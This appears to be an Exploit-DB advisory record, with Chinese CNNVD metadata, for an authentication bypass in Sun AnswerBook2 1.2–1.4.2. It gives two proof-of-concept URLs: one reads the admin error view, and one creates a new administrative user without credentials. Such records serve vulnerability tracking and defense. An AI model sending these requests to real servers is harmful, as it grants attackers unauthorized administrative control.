https://www.exploit-db.com/exploits/21677
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-626

SunAnswerBook21.2至1.4.2版本存在漏洞。远程攻击者可以借助直接请求执行如（1）AdminViewError和（2）AdminAddadmin脚本的管理脚本。

source: http://www.securityfocus.com/bid/5383/info

Sun Microsystems AnswerBook2 allows users to view Sun documentation through a web browser, and is available for Solaris.

AnswerBook2 includes an administrative web interface. Reportedly, it is possible to access these scripts without authorization, and add a new administrative user of the AnswerBook2 system. 

http://localhost:8888/ab2/@AdminViewError

http://localhost:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar

来源:XF
名称:answerbook2-admin-scripts-access(9756)
链接:http://www.iss.net/security_center/static/9756.php
来源:BID
名称:5383
链接:http://www.securityfocus.com/bid/5383
来源:BUGTRAQ
名称:20020801SunAnswerBook2formatstringandothervulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0486.html